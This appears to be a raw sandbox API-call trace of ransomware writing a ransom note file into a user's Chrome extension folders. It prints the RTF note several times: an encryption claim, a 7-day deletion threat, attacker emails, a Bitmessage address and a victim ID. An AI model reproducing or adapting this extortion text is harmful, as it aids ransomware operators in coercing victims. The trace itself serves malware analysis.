fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.340] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.341] CloseHandle (hObject=0x294) returned 1 [0272.341] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0272.341] GetLastError () returned 0x2 [0272.341] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer 